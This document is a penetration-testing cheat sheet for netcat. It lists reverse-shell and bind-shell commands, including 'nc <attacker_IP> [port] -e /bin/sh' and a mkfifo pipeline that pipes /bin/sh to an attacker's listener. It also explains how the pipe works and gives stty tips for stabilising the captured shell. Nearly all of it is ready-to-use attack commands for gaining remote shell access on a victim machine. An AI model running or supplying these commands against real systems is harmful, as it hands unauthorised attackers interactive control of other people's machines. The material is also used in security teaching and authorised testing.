netcat

Reverse shell

Basic command on attacker machine:

# Listen on a TCP port
$ nc -lp [port]

Command to be executed on the victim's machine:

# option 1
$ nc <attacker_IP> [port] -e /bin/sh


# option 2: -e flag might not be present for some netcat versions
$ rm /tmp/fifo; mkfifo /tmp/fifo; cat /tmp/fifo | /bin/sh -i 2>&1 | nc <attacker_IP> [port] > /tmp/fifo

Bind shell

Basic command on attacker machine:

# Listen on a TCP port
$ nc <victim_IP> <port>

Command to be executed on the victim's machine:

# option 1
$ nc -lp [port] -e /bin/sh

# option 2: with $ symbol on attacker machine
$ rm /tmp/fifo; mkfifo /tmp/fifo; cat /tmp/fifo | /bin/sh -i 2>&1 | nc -lp [port] > /tmp/fifo

Explanation for commands use in option 2 of reverse/bind shell

What is a fifo (named pipe) file?

‘mkfifo’ is primarily used when two processes need to communicate with each other but do not have a parent-child relationship. A FIFO special file is an extension of pipes, which offers a pathway for data between two processes. The FIFO special file can be opened by multiple processes for reading and writing. It is especially useful in scenarios where data streaming is necessary.

Master the Linux ‘mkfifo’ Command: A Comprehensive GuideMedium

mkfifo command

1. rm /tmp/fifo: Remove the fifo (named pipe) file if it already exists

2. mkfifo /tmp/fifo: Create a fifo file at the location /tmp/fifo using the mkfifo command

3. cat /tmp/fifo: Retrieve content of the created fifo file

4. /bin/sh-i 2>&1: Simply executes the current shell, with the -i flag for interactive shell mode, and 2>&1 which redirects standard error to standard output, combining both output streams

5. nc -lp [port] > /tmp/fifo: Runs the netcat command and sends the output to /tmp/fifo.

Overview

These series of commands essentially continuously waits for an input from the attacker machine, before executing it with the current shell, before sending back as input through the established netcat connection:

cat /tmp/fifo | /bin/sh -i 2>&1 | nc ... > /tmp/fifo

a) Attacker sends remote command, which is directed to (>) /tmp/fifo

b) When the value of /tmp/fifochanges, the cat command would retrieve the new value and pipe it as input to the /bin/sh -i 2>&1 command

c) The output from the executed shell command would be piped back as input through the netcat connection to be viewed on the attacker machine

Useful commands to allow smooth interactions

Note: These commands should be ran from the attacker's machine terminal, and not on the target shell itself

1. stty tool

$ stty -a

# controls the registered width/height of the terminal - useful to allow smooth interactions with text editors 
$ stty cols <value>
$ sttyl rows <value>